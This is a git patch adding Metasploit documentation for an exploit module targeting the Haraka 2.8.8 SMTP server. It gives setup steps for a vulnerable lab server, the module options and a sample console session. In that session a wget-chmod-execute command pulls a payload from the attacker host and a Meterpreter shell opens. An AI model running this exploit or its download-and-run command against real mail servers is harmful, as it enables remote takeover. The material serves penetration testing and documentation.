From 651f1a0870d2e36bd8a4b4b2e52d4e826f068a78 Mon Sep 17 00:00:00 2001 From: "Mark Bergman (aka xychix)" Date: Fri, 27 Jan 2017 10:31:12 +0100 Subject: [PATCH] Create harakiri.md --- .../modules/exploit/linux/smtp/harakiri.md | 127 ++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 documentation/modules/exploit/linux/smtp/harakiri.md diff --git a/documentation/modules/exploit/linux/smtp/harakiri.md b/documentation/modules/exploit/linux/smtp/harakiri.md new file mode 100644 index 0000000000..10b8e9a547 --- /dev/null +++ b/documentation/modules/exploit/linux/smtp/harakiri.md @@ -0,0 +1,127 @@ +## Vulnerable Application + + You can get the vulnerable Haraka installes by running this script: + ```` + #Install a clean server (for example on Digital Ocean) + #I picked the smallest Ubuntu 16.04.1 LTS for this guide. + #I needed to enable swap on that installation + fallocate -l 4G /swapfile + chmod 600 /swapfile + mkswap /swapfile + swapon /swapfile + swapon -s + + #install nodejs and npm: Note I have no clue what I'm doing here but it works! + apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y + wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz + tar xvzf v2.8.8.tar.gz + cd Haraka-2.8.8/ + npm install -g npm + ln -s /usr/bin/nodejs /usr/bin/node + npm install -g + + #Haraka setup + haraka -i /root/haraka + + cat << EOF > /root/haraka/config/plugins + access + rcpt_to.in_host_list + data.headers + attachment + test_queue + max_unrecognized_commands + EOF + + cat << EOF >> /root/haraka/config/host_list + haraka.test + EOF + + # Launch haraka as root + haraka -c /root/haraka/ + ```` + +## Verification Steps + + Example steps in this format: + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/linux/smtp/harakiri``` + 4. Do: ```set RHOST ``` + 5. Do: ```expoit``` + 6. You should get a shell. If not play with MAILFROM MAILTO options. + +## Options + + **EHLO** + + String used in the SMTP EHLO command + + **MAILTO** + + String used in the SMTP MAILTO command + + **MAILFROM** + + String used in the SMTP FROM command + + **DOWNHOST** + + Download server for payload (if empty SRVHOST will be used) + + **DOWNFILE** + + File to download from DOWNHOST (if empty a random name will be generated and used) + +## Scenarios + + Specific demo of using the module that might be useful in a real world scenario. + + ``` + #msfconsole + + =[ metasploit v4.13.15-dev ] + + -- --=[ 1614 exploits - 915 auxiliary - 279 post ] + + -- --=[ 471 payloads - 39 encoders - 9 nops ] + + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] + + msf > use exploit/linux/smtp/harakiri + msf exploit(harakiri) > set RHOST 257.6.26.2 + RHOST => 257.6.26.2 + msf exploit(harakiri) > exploit + [*] Exploit running as background job. + + [*] Started reverse TCP handler on 6.6.6.6:4444 + [*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ... + [*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw + [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw + msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw + [*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello burn.outflank.nl [6.6.6.6], Haraka is at your service. + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0 + [*] 257.6.26.2:25 - 257.6.26.2:25 - MAIL: 250 sender OK + [*] 257.6.26.2:25 - 257.6.26.2:25 - RCPT: 250 recipient OK + [*] 257.6.26.2:25 - 257.6.26.2:25 - DATA: 354 go ahead, make my day + [*] 257.6.26.2:25 - 257.6.26.2:25 - Sending the payload to the server... + [*] Transmitting intermediate stager for over-sized stage...(105 bytes) + [*] Sending stage (1495599 bytes) to 257.6.26.2 + [*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100 + + msf exploit(harakiri) > + [*] 257.6.26.2:25 - Server stopped. + + msf exploit(harakiri) > + ``` + + For example: + + To do this specific thing, here's how you do it: + + ``` + msf > use exploit/linux/smtp/harakiri + msf exploit(harakiri) > set RHOST 257.6.26.2 + RHOST => 257.6.26.2 + msf exploit(harakiri) > exploit + ```